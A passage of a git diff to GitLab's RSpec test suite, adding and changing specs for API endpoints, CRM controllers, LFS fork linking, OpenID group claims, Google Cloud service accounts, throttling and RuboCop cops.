'2020-01-01', + trailer: 'Foo' + } + ) + + expect(response).to have_gitlab_http_status(:ok) + expect(json_response['notes']).to be_present + end + end + describe 'POST /projects/:id/repository/changelog' do it 'generates the changelog for a version' do spy = instance_spy(Repositories::ChangelogService) @@ -751,7 +816,7 @@ RSpec.describe API::Repositories do ) .and_return(spy) - allow(spy).to receive(:execute) + allow(spy).to receive(:execute).with(commit_to_changelog: true) post( api("/projects/#{project.id}/repository/changelog", user), @@ -787,7 +852,7 @@ RSpec.describe API::Repositories do ) .and_return(spy) - expect(spy).to receive(:execute) + expect(spy).to receive(:execute).with(commit_to_changelog: true) post( api("/projects/#{project.id}/repository/changelog", user), diff --git a/spec/requests/api/search_spec.rb b/spec/requests/api/search_spec.rb index 8012892a571..b75fe11b06d 100644 --- a/spec/requests/api/search_spec.rb +++ b/spec/requests/api/search_spec.rb @@ -122,6 +122,23 @@ RSpec.describe API::Search do end end + context 'when DB timeouts occur from global searches', :aggregate_errors do + %w( + issues + merge_requests + milestones + projects + snippet_titles + users + ).each do |scope| + it "returns a 408 error if search with scope: #{scope} times out" do + allow(SearchService).to receive(:new).and_raise ActiveRecord::QueryCanceled + get api(endpoint, user), params: { scope: scope, search: 'awesome' } + expect(response).to have_gitlab_http_status(:request_timeout) + end + end + end + context 'when scope is not supported' do it 'returns 400 error' do get api(endpoint, user), params: { scope: 'unsupported', search: 'awesome' } diff --git a/spec/requests/api/settings_spec.rb b/spec/requests/api/settings_spec.rb index 641c6a2cd91..7e940d52a41 100644 --- a/spec/requests/api/settings_spec.rb +++ b/spec/requests/api/settings_spec.rb @@ -523,15 +523,6 @@ RSpec.describe API::Settings, 'Settings', :do_not_mock_admin_mode_setting do end end - context "missing spam_check_api_key value when spam_check_endpoint_enabled is true" do - it "returns a blank parameter error message" do - put api("/application/settings", admin), params: { spam_check_endpoint_enabled: true, spam_check_endpoint_url: "https://example.com/spam_check" } - - expect(response).to have_gitlab_http_status(:bad_request) - expect(json_response['error']).to eq('spam_check_api_key is missing') - end - end - context "overly long spam_check_api_key" do it "fails to update the settings with too long spam_check_api_key" do put api("/application/settings", admin), params: { spam_check_api_key: "0123456789" * 500 } diff --git a/spec/requests/api/terraform/state_spec.rb b/spec/requests/api/terraform/state_spec.rb index 5d2635126e8..24f38b04348 100644 --- a/spec/requests/api/terraform/state_spec.rb +++ b/spec/requests/api/terraform/state_spec.rb @@ -152,6 +152,16 @@ RSpec.describe API::Terraform::State do expect(response).to have_gitlab_http_status(:ok) expect(Gitlab::Json.parse(response.body)).to be_empty end + + context 'when serial already exists' do + let(:params) { { 'instance': 'example-instance', 'serial': state.latest_version.version } } + + it 'returns unprocessable entity' do + request + + expect(response).to have_gitlab_http_status(:unprocessable_entity) + end + end end context 'without body' do diff --git a/spec/requests/api/todos_spec.rb b/spec/requests/api/todos_spec.rb index c6b4f50afae..0944bfb6ba6 100644 --- a/spec/requests/api/todos_spec.rb +++ b/spec/requests/api/todos_spec.rb @@ -380,7 +380,7 @@ RSpec.describe API::Todos do end end - describe 'POST :id/issuable_type/:issueable_id/todo' do + describe 'POST :id/issuable_type/:issuable_id/todo' do context 'for an issue' do let_it_be(:issuable) do create(:issue, :confidential, project: project_1) diff --git a/spec/requests/api/topics_spec.rb b/spec/requests/api/topics_spec.rb index a5746a4022e..70eee8a1af9 100644 --- a/spec/requests/api/topics_spec.rb +++ b/spec/requests/api/topics_spec.rb @@ -5,15 +5,15 @@ require 'spec_helper' RSpec.describe API::Topics do include WorkhorseHelpers - let_it_be(:topic_1) { create(:topic, name: 'Git', total_projects_count: 1) } + let_it_be(:file) { fixture_file_upload('spec/fixtures/dk.png') } + + let_it_be(:topic_1) { create(:topic, name: 'Git', total_projects_count: 1, avatar: file) } let_it_be(:topic_2) { create(:topic, name: 'GitLab', total_projects_count: 2) } let_it_be(:topic_3) { create(:topic, name: 'other-topic', total_projects_count: 3) } let_it_be(:admin) { create(:user, :admin) } let_it_be(:user) { create(:user) } - let(:file) { fixture_file_upload('spec/fixtures/dk.png') } - describe 'GET /topics', :aggregate_failures do it 'returns topics ordered by total_projects_count' do get api('/topics') @@ -184,6 +184,14 @@ RSpec.describe API::Topics do expect(json_response['avatar_url']).to end_with('dk.png') end + it 'keeps avatar when updating other fields' do + put api("/topics/#{topic_1.id}", admin), params: { name: 'my-topic' } + + expect(response).to have_gitlab_http_status(:ok) + expect(json_response['name']).to eq('my-topic') + expect(topic_1.reload.avatar_url).not_to be_nil + end + it 'returns 404 for non existing id' do put api("/topics/#{non_existing_record_id}", admin), params: { name: 'my-topic' } @@ -196,6 +204,32 @@ RSpec.describe API::Topics do expect(response).to have_gitlab_http_status(:bad_request) expect(json_response['error']).to eql('id is invalid') end + + context 'with blank avatar' do + it 'removes avatar' do + put api("/topics/#{topic_1.id}", admin), params: { avatar: '' } + + expect(response).to have_gitlab_http_status(:ok) + expect(json_response['avatar_url']).to be_nil + expect(topic_3.reload.avatar_url).to be_nil + end + + it 'removes avatar besides other changes' do + put api("/topics/#{topic_1.id}", admin), params: { name: 'new-topic-name', avatar: '' } + + expect(response).to have_gitlab_http_status(:ok) + expect(json_response['name']).to eq('new-topic-name') + expect(json_response['avatar_url']).to be_nil + expect(topic_1.reload.avatar_url).to be_nil + end + + it 'does not remove avatar in case of other errors' do + put api("/topics/#{topic_1.id}", admin), params: { name: topic_2.name, avatar: '' } + + expect(response).to have_gitlab_http_status(:bad_request) + expect(topic_1.reload.avatar_url).not_to be_nil + end + end end context 'as normal user' do diff --git a/spec/requests/api/v3/github_spec.rb b/spec/requests/api/v3/github_spec.rb index 6d8ae226ce4..838948132dd 100644 --- a/spec/requests/api/v3/github_spec.rb +++ b/spec/requests/api/v3/github_spec.rb @@ -567,18 +567,6 @@ RSpec.describe API::V3::Github do expect(response_diff_files(response)).to be_blank end - it 'does not handle the error when feature flag is disabled', :aggregate_failures do - stub_feature_flags(api_v3_commits_skip_diff_files: false) - - allow(Gitlab::GitalyClient).to receive(:call) - .with(*commit_diff_args) - .and_raise(GRPC::DeadlineExceeded) - - call_api - - expect(response).to have_gitlab_http_status(:error) - end - it 'only calls Gitaly once for all attempts within a period of time', :aggregate_failures do expect(Gitlab::GitalyClient).to receive(:call) .with(*commit_diff_args) diff --git a/spec/requests/groups/crm/contacts_controller_spec.rb b/spec/requests/groups/crm/contacts_controller_spec.rb new file mode 100644 index 00000000000..a4b2a28e77a --- /dev/null +++ b/spec/requests/groups/crm/contacts_controller_spec.rb @@ -0,0 +1,101 @@ +# frozen_string_literal: true + +require 'spec_helper' + +RSpec.describe Groups::Crm::ContactsController do + let_it_be(:user) { create(:user) } + + shared_examples 'response with 404 status' do + it 'returns 404' do + subject + + expect(response).to have_gitlab_http_status(:not_found) + end + end + + shared_examples 'ok response with index template' do + it 'renders the index template' do + subject + + expect(response).to have_gitlab_http_status(:ok) + expect(response).to render_template(:index) + end + end + + shared_examples 'ok response with index template if authorized' do + context 'private group' do + let(:group) { create(:group, :private) } + + context 'with authorized user' do + before do + group.add_reporter(user) + sign_in(user) + end + + context 'when feature flag is enabled' do + it_behaves_like 'ok response with index template' + end + + context 'when feature flag is not enabled' do + before do + stub_feature_flags(customer_relations: false) + end + + it_behaves_like 'response with 404 status' + end + end + + context 'with unauthorized user' do + before do + sign_in(user) + end + + it_behaves_like 'response with 404 status' + end + + context 'with anonymous user' do + it 'blah' do + subject + + expect(response).to have_gitlab_http_status(:found) + expect(response).to redirect_to(new_user_session_path) + end + end + end + + context 'public group' do + let(:group) { create(:group, :public) } + + context 'with anonymous user' do + it_behaves_like 'ok response with index template' + end + end + end + + describe 'GET #index' do + subject do + get group_crm_contacts_path(group) + response + end + + it_behaves_like 'ok response with index template if authorized' + end + + describe 'GET #new' do + subject do + get new_group_crm_contact_path(group) + response + end + + it_behaves_like 'ok response with index template if authorized' + end + + describe 'GET #edit' do + subject do + get edit_group_crm_contact_path(group, id: 1) + response + end + + it_behaves_like 'ok response with index template if authorized' + end +end diff --git a/spec/requests/groups/crm/organizations_controller_spec.rb b/spec/requests/groups/crm/organizations_controller_spec.rb new file mode 100644 index 00000000000..7595950350d --- /dev/null +++ b/spec/requests/groups/crm/organizations_controller_spec.rb @@ -0,0 +1,91 @@ +# frozen_string_literal: true + +require 'spec_helper' + +RSpec.describe Groups::Crm::OrganizationsController do + let_it_be(:user) { create(:user) } + + shared_examples 'response with 404 status' do + it 'returns 404' do + subject + + expect(response).to have_gitlab_http_status(:not_found) + end + end + + shared_examples 'ok response with index template' do + it 'renders the index template' do + subject + + expect(response).to have_gitlab_http_status(:ok) + expect(response).to render_template(:index) + end + end + + shared_examples 'ok response with index template if authorized' do + context 'private group' do + let(:group) { create(:group, :private) } + + context 'with authorized user' do + before do + group.add_reporter(user) + sign_in(user) + end + + context 'when feature flag is enabled' do + it_behaves_like 'ok response with index template' + end + + context 'when feature flag is not enabled' do + before do + stub_feature_flags(customer_relations: false) + end + + it_behaves_like 'response with 404 status' + end + end + + context 'with unauthorized user' do + before do + sign_in(user) + end + + it_behaves_like 'response with 404 status' + end + + context 'with anonymous user' do + it 'blah' do + subject + + expect(response).to have_gitlab_http_status(:found) + expect(response).to redirect_to(new_user_session_path) + end + end + end + + context 'public group' do + let(:group) { create(:group, :public) } + + context 'with anonymous user' do + it_behaves_like 'ok response with index template' + end + end + end + + describe 'GET #index' do + subject do + get group_crm_organizations_path(group) + response + end + + it_behaves_like 'ok response with index template if authorized' + end + + describe 'GET #new' do + subject do + get new_group_crm_organization_path(group) + end + + it_behaves_like 'ok response with index template if authorized' + end +end diff --git a/spec/requests/lfs_http_spec.rb b/spec/requests/lfs_http_spec.rb index 656ae744ac1..f89395fccaf 100644 --- a/spec/requests/lfs_http_spec.rb +++ b/spec/requests/lfs_http_spec.rb @@ -518,13 +518,51 @@ RSpec.describe 'Git LFS API and storage' do end context 'in source of fork project' do + let(:other_project) { create(:project, :empty_repo) } let(:project) { fork_project(other_project) } before do lfs_object.update!(projects: [other_project]) end - it_behaves_like 'batch upload with existing LFS object' + context 'when user has access to both the parent and fork' do + before do + project.add_developer(user) + other_project.add_developer(user) + end + + it 'links existing LFS objects to other project' do + expect(Gitlab::AppJsonLogger).to receive(:info).with( + message: "LFS object auto-linked to forked project", + lfs_object_oid: lfs_object.oid, + lfs_object_size: lfs_object.size, + source_project_id: other_project.id, + source_project_path: other_project.full_path, + target_project_id: project.id, + target_project_path: project.full_path).and_call_original + expect(json_response['objects']).to be_kind_of(Array) + expect(json_response['objects'].first).to include(sample_object) + expect(json_response['objects'].first).not_to have_key('actions') + + expect(lfs_object.reload.projects.pluck(:id)).to match_array([other_project.id, project.id]) + end + + context 'when feature flag is disabled' do + before do + stub_feature_flags(lfs_auto_link_fork_source: false) + end + + it_behaves_like 'batch upload with existing LFS object' + end + end + + context 'when user does not have access to parent' do + before do + project.add_developer(user) + end + + it_behaves_like 'batch upload with existing LFS object' + end end end diff --git a/spec/requests/openid_connect_spec.rb b/spec/requests/openid_connect_spec.rb index 5ec23382698..8ee752da44e 100644 --- a/spec/requests/openid_connect_spec.rb +++ b/spec/requests/openid_connect_spec.rb @@ -37,7 +37,10 @@ RSpec.describe 'OpenID Connect requests' do 'website' => 'https://example.com', 'profile' => 'http://localhost/alice', 'picture' => "http://localhost/uploads/-/system/user/avatar/#{user.id}/dk.png", - 'groups' => kind_of(Array) + 'groups' => kind_of(Array), + 'https://gitlab.org/claims/groups/owner' => kind_of(Array), + 'https://gitlab.org/claims/groups/maintainer' => kind_of(Array), + 'https://gitlab.org/claims/groups/developer' => kind_of(Array) } end @@ -119,6 +122,7 @@ RSpec.describe 'OpenID Connect requests' do before do group1.add_user(user, GroupMember::OWNER) group3.add_user(user, Gitlab::Access::DEVELOPER) + group4.add_user(user, Gitlab::Access::MAINTAINER) request_user_info! end @@ -129,6 +133,10 @@ RSpec.describe 'OpenID Connect requests' do expected_groups = [group1.full_path, group3.full_path] expected_groups << group4.full_path expect(json_response['groups']).to match_array(expected_groups) + + expect(json_response['https://gitlab.org/claims/groups/owner']).to match_array([group1.full_path]) + expect(json_response['https://gitlab.org/claims/groups/maintainer']).to match_array([group4.full_path]) + expect(json_response['https://gitlab.org/claims/groups/developer']).to match_array([group3.full_path]) end it 'does not include any unknown claims' do diff --git a/spec/requests/projects/google_cloud/service_accounts_controller_spec.rb b/spec/requests/projects/google_cloud/service_accounts_controller_spec.rb new file mode 100644 index 00000000000..6b4d1c490e2 --- /dev/null +++ b/spec/requests/projects/google_cloud/service_accounts_controller_spec.rb @@ -0,0 +1,184 @@ +# frozen_string_literal: true + +require 'spec_helper' + +# Mock Types +MockGoogleOAuth2Credentials = Struct.new(:app_id, :app_secret) +MockServiceAccount = Struct.new(:project_id, :unique_id) + +RSpec.describe Projects::GoogleCloud::ServiceAccountsController do + let_it_be(:project) { create(:project, :public) } + + describe 'GET index' do + let_it_be(:url) { "#{project_google_cloud_service_accounts_path(project)}" } + + let(:user_guest) { create(:user) } + let(:user_developer) { create(:user) } + let(:user_maintainer) { create(:user) } + let(:user_creator) { project.creator } + + let(:unauthorized_members) { [user_guest, user_developer] } + let(:authorized_members) { [user_maintainer, user_creator] } + + before do + project.add_guest(user_guest) + project.add_developer(user_developer) + project.add_maintainer(user_maintainer) + end + + context 'when a public request is made' do + it 'returns not found on GET request' do + get url + + expect(response).to have_gitlab_http_status(:not_found) + end + + it 'returns not found on POST request' do + post url + + expect(response).to have_gitlab_http_status(:not_found) + end + end + + context 'when unauthorized members make requests' do + it 'returns not found on GET request' do + unauthorized_members.each do |unauthorized_member| + sign_in(unauthorized_member) + + get url + + expect(response).to have_gitlab_http_status(:not_found) + end + end + + it 'returns not found on POST request' do + unauthorized_members.each do |unauthorized_member| + sign_in(unauthorized_member) + + post url + + expect(response).to have_gitlab_http_status(:not_found) + end + end + end + + context 'when authorized members make requests' do + it 'redirects on GET request' do + authorized_members.each do |authorized_member| + sign_in(authorized_member) + + get url + + expect(response).to redirect_to(assigns(:authorize_url)) + end + end + + it 'redirects on POST request' do + authorized_members.each do |authorized_member| + sign_in(authorized_member) + + post url + + expect(response).to redirect_to(assigns(:authorize_url)) + end + end + + context 'and user has successfully completed the google oauth2 flow' do + before do + allow_next_instance_of(GoogleApi::CloudPlatform::Client) do |client| + allow(client).to receive(:validate_token).and_return(true) + allow(client).to receive(:list_projects).and_return([{}, {}, {}]) + allow(client).to receive(:create_service_account).and_return(MockServiceAccount.new(123, 456)) + allow(client).to receive(:create_service_account_key).and_return({}) + end + end + + it 'returns success on GET' do + authorized_members.each do |authorized_member| + sign_in(authorized_member) + + get url + + expect(response).to have_gitlab_http_status(:ok) + end + end + + it 'returns success on POST' do + authorized_members.each do |authorized_member| + sign_in(authorized_member) + + post url, params: { gcp_project: 'prj1', environment: 'env1' } + + expect(response).to redirect_to(project_google_cloud_index_path(project)) + end + end + end + + context 'but google returns client error' do + before do + allow_next_instance_of(GoogleApi::CloudPlatform::Client) do |client| + allow(client).to receive(:validate_token).and_return(true) + allow(client).to receive(:list_projects).and_raise(Google::Apis::ClientError.new('')) + allow(client).to receive(:create_service_account).and_raise(Google::Apis::ClientError.new('')) + allow(client).to receive(:create_service_account_key).and_raise(Google::Apis::ClientError.new('')) + end + end + + it 'renders gcp_error template on GET' do + authorized_members.each do |authorized_member| + sign_in(authorized_member) + + get url + + expect(response).to render_template(:gcp_error) + end + end + + it 'renders gcp_error template on POST' do + authorized_members.each do |authorized_member| + sign_in(authorized_member) + + post url, params: { gcp_project: 'prj1', environment: 'env1' } + + expect(response).to render_template(:gcp_error) + end + end + end + + context 'but gitlab instance is not configured for google oauth2' do + before do + unconfigured_google_oauth2 = MockGoogleOAuth2Credentials.new('', '') + allow(Gitlab::Auth::OAuth::Provider).to receive(:config_for) + .with('google_oauth2') + .and_return(unconfigured_google_oauth2) + end + + it 'returns forbidden' do + authorized_members.each do |authorized_member| + sign_in(authorized_member) + + get url + + expect(response).to have_gitlab_http_status(:forbidden) + end + end + end + + context 'but feature flag is disabled' do + before do + stub_feature_flags(incubation_5mp_google_cloud: false) + end + + it 'returns not found' do + authorized_members.each do |authorized_member| + sign_in(authorized_member) + + get url + + expect(response).to have_gitlab_http_status(:not_found) + end + end + end + end + end +end diff --git a/spec/requests/projects/integrations/shimos_controller_spec.rb b/spec/requests/projects/integrations/shimos_controller_spec.rb new file mode 100644 index 00000000000..7322143f87e --- /dev/null +++ b/spec/requests/projects/integrations/shimos_controller_spec.rb @@ -0,0 +1,37 @@ +# frozen_string_literal: true + +require 'spec_helper' + +RSpec.describe ::Projects::Integrations::ShimosController do + let_it_be(:project) { create(:project) } + let_it_be(:user) { create(:user, developer_projects: [project]) } + let_it_be(:shimo_integration) { create(:shimo_integration, project: project) } + + before do + sign_in(user) + end + + describe 'GET #show' do + context 'when Shimo integration is inactive' do + before do + shimo_integration.update!(active: false) + end + + it 'returns 404 status' do + get project_integrations_shimo_path(project) + + expect(response).to have_gitlab_http_status(:not_found) + end + end + + context 'when Shimo integration is active' do + it 'renders the "show" template' do + get project_integrations_shimo_path(project) + + expect(response).to have_gitlab_http_status(:ok) + expect(response).to render_template(:show) + expect(response.body).to include shimo_integration.external_wiki_url + end + end + end +end diff --git a/spec/requests/projects/merge_requests/context_commit_diffs_spec.rb b/spec/requests/projects/merge_requests/context_commit_diffs_spec.rb new file mode 100644 index 00000000000..434e6f19ff5 --- /dev/null +++ b/spec/requests/projects/merge_requests/context_commit_diffs_spec.rb @@ -0,0 +1,99 @@ +# frozen_string_literal: true + +require 'spec_helper' + +RSpec.describe 'Merge Requests Context Commit Diffs' do + let_it_be(:sha1) { "33f3729a45c02fc67d00adb1b8bca394b0e761d9" } + let_it_be(:project) { create(:project, :repository) } + let_it_be(:user) { create(:user) } + let_it_be(:merge_request) { create(:merge_request, target_project: project, source_project: project) } + let_it_be(:merge_request_context_commit) { create(:merge_request_context_commit, merge_request: merge_request, sha: sha1) } + + before do + project.add_maintainer(user) + sign_in(user) + end + + describe 'GET diffs_batch' do + let(:headers) { {} } + + shared_examples_for 'serializes diffs with expected arguments' do + it 'serializes paginated merge request diff collection' do + expect_next_instance_of(PaginatedDiffSerializer) do |instance| + expect(instance).to receive(:represent) + .with(an_instance_of(collection), expected_options) + .and_call_original + end + + subject + end + end + + def collection_arguments(pagination_data = {}) + { + environment: nil, + merge_request: merge_request, + commit: nil, + diff_view: :inline, + merge_ref_head_diff: nil, + allow_tree_conflicts: true, + pagination_data: { + total_pages: nil + }.merge(pagination_data) + } + end + + def go(extra_params = {}) + params = { + namespace_id: project.namespace.to_param, + project_id: project, + id: merge_request.iid, + only_context_commits: true, + page: 0, + per_page: 20, + format: 'json' + } + + get diffs_batch_namespace_project_json_merge_request_path(params.merge(extra_params)), headers: headers + end + + context 'with caching', :use_clean_rails_memory_store_caching do + subject { go(page: 0, per_page: 5) } + + context 'when the request has not been cached' do + it_behaves_like 'serializes diffs with expected arguments' do + let(:collection) { Gitlab::Diff::FileCollection::Compare } + let(:expected_options) { collection_arguments } + end + end + + context 'when the request has already been cached' do + before do + go(page: 0, per_page: 5) + end + + it 'does not serialize diffs' do + expect_next_instance_of(PaginatedDiffSerializer) do |instance| + expect(instance).not_to receive(:represent) + end + + subject + end + + context 'with the different user' do + let(:another_user) { create(:user) } + + before do + project.add_maintainer(another_user) + sign_in(another_user) + end + + it_behaves_like 'serializes diffs with expected arguments' do + let(:collection) { Gitlab::Diff::FileCollection::Compare } + let(:expected_options) { collection_arguments } + end + end + end + end + end +end diff --git a/spec/requests/projects/merge_requests/diffs_spec.rb b/spec/requests/projects/merge_requests/diffs_spec.rb index 349cbf1b76c..ad50c39c65d 100644 --- a/spec/requests/projects/merge_requests/diffs_spec.rb +++ b/spec/requests/projects/merge_requests/diffs_spec.rb @@ -31,6 +31,7 @@ RSpec.describe 'Merge Requests Diffs' do { environment: nil, merge_request: merge_request, + commit: nil, diff_view: :inline, merge_ref_head_diff: nil, allow_tree_conflicts: true, diff --git a/spec/requests/projects/usage_quotas_spec.rb b/spec/requests/projects/usage_quotas_spec.rb index 114e9bd9f1e..6e449a21804 100644 --- a/spec/requests/projects/usage_quotas_spec.rb +++ b/spec/requests/projects/usage_quotas_spec.rb @@ -23,20 +23,10 @@ RSpec.describe 'Project Usage Quotas' do describe 'GET /:namespace/:project/usage_quotas' do it 'renders usage quotas path' do - mock_storage_app_data = { - project_path: project.full_path, - usage_quotas_help_page_path: help_page_path('user/usage_quotas'), - build_artifacts_help_page_path: help_page_path('ci/pipelines/job_artifacts', anchor: 'when-job-artifacts-are-deleted'), - packages_help_page_path: help_page_path('user/packages/package_registry/index.md', anchor: 'delete-a-package'), - repository_help_page_path: help_page_path('user/project/repository/reducing_the_repo_size_using_git'), - snippets_help_page_path: help_page_path('user/snippets', anchor: 'reduce-snippets-repository-size'), - wiki_help_page_path: help_page_path('administration/wikis/index.md', anchor: 'reduce-wiki-repository-size') - } get project_usage_quotas_path(project) expect(response).to have_gitlab_http_status(:ok) expect(response.body).to include(project_usage_quotas_path(project)) - expect(assigns[:storage_app_data]).to eq(mock_storage_app_data) expect(response.body).to include("Usage of project resources across the <strong>#{project.name}</strong> project") end diff --git a/spec/requests/rack_attack_global_spec.rb b/spec/requests/rack_attack_global_spec.rb index ab0c76397e4..244ec111a0c 100644 --- a/spec/requests/rack_attack_global_spec.rb +++ b/spec/requests/rack_attack_global_spec.rb @@ -520,7 +520,7 @@ RSpec.describe 'Rack Attack global throttles', :use_clean_rails_memory_store_cac let(:head_response) { { status: :success } } before do - allow_next_instance_of(DependencyProxy::FindOrCreateManifestService) do |instance| + allow_next_instance_of(DependencyProxy::FindCachedManifestService) do |instance| allow(instance).to receive(:execute).and_return(pull_response) end allow_next_instance_of(DependencyProxy::HeadManifestService) do |instance| @@ -720,19 +720,6 @@ RSpec.describe 'Rack Attack global throttles', :use_clean_rails_memory_store_cac expect_rejection { do_request } end - context 'when feature flag is off' do - before do - stub_feature_flags(files_api_throttling: false) - end - - it 'allows requests over the rate limit' do - (1 + requests_per_period).times do - do_request - expect(response).to have_gitlab_http_status(:ok) - end - end - end - context 'when unauthenticated api throttle is lower' do before do settings_to_set[:throttle_unauthenticated_api_requests_per_period] = 0 @@ -817,19 +804,6 @@ RSpec.describe 'Rack Attack global throttles', :use_clean_rails_memory_store_cac expect_rejection { do_request } end end - - context 'when feature flag is off' do - before do - stub_feature_flags(files_api_throttling: false) - end - - it 'allows requests over the rate limit' do - (1 + requests_per_period).times do - do_request - expect(response).to have_gitlab_http_status(:ok) - end - end - end end context 'when authenticated files api throttle is disabled' do diff --git a/spec/routing/notifications_routing_spec.rb b/spec/routing/notifications_routing_spec.rb index d66aa7f219f..303281c763e 100644 --- a/spec/routing/notifications_routing_spec.rb +++ b/spec/routing/notifications_routing_spec.rb @@ -12,7 +12,8 @@ RSpec.describe "notifications routing" do end it 'routes to group #update' do - expect(put("/-/profile/notifications/groups/gitlab-org")).to route_to("profiles/groups#update", id: 'gitlab-org') - expect(put("/-/profile/notifications/groups/gitlab.org")).to route_to("profiles/groups#update", id: 'gitlab.org') + expect(put("/-/profile/groups/gitlab-org/notifications")).to route_to("profiles/groups#update", id: 'gitlab-org') + expect(put("/-/profile/groups/gitlab.org/notifications/")).to route_to("profiles/groups#update", id: 'gitlab.org') + expect(put("/-/profile/groups/gitlab.org/gitlab/notifications")).to route_to("profiles/groups#update", id: 'gitlab.org/gitlab') end end diff --git a/spec/rubocop/code_reuse_helpers_spec.rb b/spec/rubocop/code_reuse_helpers_spec.rb index 695c152e3db..3220cff1681 100644 --- a/spec/rubocop/code_reuse_helpers_spec.rb +++ b/spec/rubocop/code_reuse_helpers_spec.rb @@ -21,6 +21,8 @@ RSpec.describe RuboCop::CodeReuseHelpers do end.new end + let(:ee_file_path) { File.expand_path('../../ee/app/models/license.rb', __dir__) } + describe '#send_to_constant?' do it 'returns true when sending to a constant' do node = build_and_parse_source('Foo.bar') @@ -312,4 +314,77 @@ RSpec.describe RuboCop::CodeReuseHelpers do cop.disallow_send_to(def_node, 'Finder', 'oops') end end + + describe '#ee?' do + before do + stub_env('FOSS_ONLY', nil) + allow(File).to receive(:exist?).with(ee_file_path) { true } + end + + it 'returns true when ee/app/models/license.rb exists' do + expect(cop.ee?).to eq(true) + end + end + + describe '#jh?' do + context 'when jh directory exists and EE_ONLY is not set' do + before do + stub_env('EE_ONLY', nil) + + allow(Dir).to receive(:exist?).with(File.expand_path('../../jh', __dir__)) { true } + end + + context 'when ee/app/models/license.rb exists' do + before do + allow(File).to receive(:exist?).with(ee_file_path) { true } + end + + context 'when FOSS_ONLY is not set' do + before do + stub_env('FOSS_ONLY', nil) + end + + it 'returns true' do + expect(cop.jh?).to eq(true) + end + end + + context 'when FOSS_ONLY is set to 1' do + before do + stub_env('FOSS_ONLY', '1') + end + + it 'returns false' do + expect(cop.jh?).to eq(false) + end + end + end + + context 'when ee/app/models/license.rb not exist' do + before do + allow(File).to receive(:exist?).with(ee_file_path) { false } + end + + context 'when FOSS_ONLY is not set' do + before do + stub_env('FOSS_ONLY', nil) + end + + it 'returns true' do + expect(cop.jh?).to eq(false) + end + end + + context 'when FOSS_ONLY is set to 1' do + before do + stub_env('FOSS_ONLY', '1') + end + + it 'returns false' do + expect(cop.jh?).to eq(false) + end + end + end + end + end end diff --git a/spec/rubocop/cop/graphql/authorize_types_spec.rb b/spec/rubocop/cop/graphql/authorize_types_spec.rb index 6c521789e34..7aa36030526 100644 --- a/spec/rubocop/cop/graphql/authorize_types_spec.rb +++ b/spec/rubocop/cop/graphql/authorize_types_spec.rb @@ -11,7 +11,7 @@ RSpec.describe RuboCop::Cop::Graphql::AuthorizeTypes do expect_offense(<<~TYPE) module Types class AType < BaseObject - ^^^^^^^^^^^^^^^^^^^^^^^^ Add an `authorize :ability` call to the type: https://docs.gitlab.com/ee/development/api_graphql_styleguide.html#type-authorization + ^^^^^^^^^^^^^^^^^^^^^^^^ Add an `authorize :ability` call to the type: https://docs.gitlab.com/ee/development/graphql_guide/authorization.html#type-authorization field :a_thing field :another_thing end diff --git a/spec/rubocop/cop/graphql/old_types_spec.rb b/spec/rubocop/cop/graphql/old_types_spec.rb index 396bf4ce997..5cf3b11548f 100644 --- a/spec/rubocop/cop/graphql/old_types_spec.rb +++ b/spec/rubocop/cop/graphql/old_types_spec.rb @@ -10,10 +10,16 @@ RSpec.describe RuboCop::Cop::Graphql::OldTypes do subject(:cop) { described_class.new } where(:old_type, :message) do - 'GraphQL::ID_TYPE' | 'Avoid using GraphQL::ID_TYPE. Use GraphQL::Types::ID instead' - 'GraphQL::INT_TYPE' | 'Avoid using GraphQL::INT_TYPE. Use GraphQL::Types::Int instead' - 'GraphQL::STRING_TYPE' | 'Avoid using GraphQL::STRING_TYPE. Use GraphQL::Types::String instead' - 'GraphQL::BOOLEAN_TYPE' | 'Avoid using GraphQL::BOOLEAN_TYPE. Use GraphQL::Types::Boolean instead' + 'GraphQL::ID_TYPE' | 'Avoid using GraphQL::ID_TYPE. Use GraphQL::Types::ID instead' + 'GraphQL::INT_TYPE' | 'Avoid using GraphQL::INT_TYPE. Use GraphQL::Types::Int instead' + 'GraphQL::STRING_TYPE' | 'Avoid using GraphQL::STRING_TYPE. Use GraphQL::Types::String instead' + 'GraphQL::BOOLEAN_TYPE' | 'Avoid using GraphQL::BOOLEAN_TYPE. Use GraphQL::Types::Boolean instead' + 'GraphQL::FLOAT_TYPE' | 'Avoid using GraphQL::FLOAT_TYPE. Use GraphQL::Types::Float instead' + '::GraphQL::ID_TYPE' | 'Avoid using GraphQL::ID_TYPE. Use GraphQL::Types::ID instead' + '::GraphQL::INT_TYPE' | 'Avoid using GraphQL::INT_TYPE. Use GraphQL::Types::Int instead' + '::GraphQL::STRING_TYPE' | 'Avoid using GraphQL::STRING_TYPE. Use GraphQL::Types::String instead' + '::GraphQL::BOOLEAN_TYPE' | 'Avoid using GraphQL::BOOLEAN_TYPE. Use GraphQL::Types::Boolean instead' + '::GraphQL::FLOAT_TYPE' | 'Avoid using GraphQL::FLOAT_TYPE. Use GraphQL::Types::Float instead' end with_them do @@ -27,7 +33,7 @@ RSpec.describe RuboCop::Cop::Graphql::OldTypes do RUBY end - it "adds an offense when an old type is used with other keywords" do + it 'adds an offense when an old type is used with other keywords' do expect_offense(<<~RUBY) class MyType field :some_field, #{old_type}, null: true, description: 'My description' diff --git a/spec/rubocop/cop/qa/testcase_link_format_spec.rb b/spec/rubocop/cop/qa/testcase_link_format_spec.rb new file mode 100644 index 00000000000..f9b43f2a293 --- /dev/null +++ b/spec/rubocop/cop/qa/testcase_link_format_spec.rb @@ -0,0 +1,45 @@ +# frozen_string_literal: true + +require 'fast_spec_helper' + +require_relative '../../../../rubocop/cop/qa/testcase_link_format' + +RSpec.describe RuboCop::Cop::QA::TestcaseLinkFormat do + let(:source_file) { 'qa/page.rb' } + let(:msg) { 'Testcase link format incorrect. Please link a test case from the GitLab project. See: https://docs.gitlab.com/ee/development/testing_guide/end_to_end/best_practices.html#link-a-test-to-its-test-case.' } + + subject(:cop) { described_class.new } + + context 'in a QA file' do + before do + allow(cop).to receive(:in_qa_file?).and_return(true) + end + + it "registers an offense for a testcase link for an issue" do + node = "it 'another test', testcase: 'https://gitlab.com/gitlab-org/gitlab/-/issues/557' do" + + expect_offense(<<-RUBY, node: node, msg: msg) + %{node} + ^{node} %{msg} + end + RUBY + end + + it "registers an offense for a testcase link for the wrong project" do + node = "it 'another test', testcase: 'https://gitlab.com/gitlab-org/quality/testcases/-/quality/test_cases/2455' do" + + expect_offense(<<-RUBY, node: node, msg: msg) + %{node} + ^{node} %{msg} + end + RUBY + end + + it "doesnt offend if testcase link is correct" do + expect_no_offenses(<<-RUBY) + it 'some 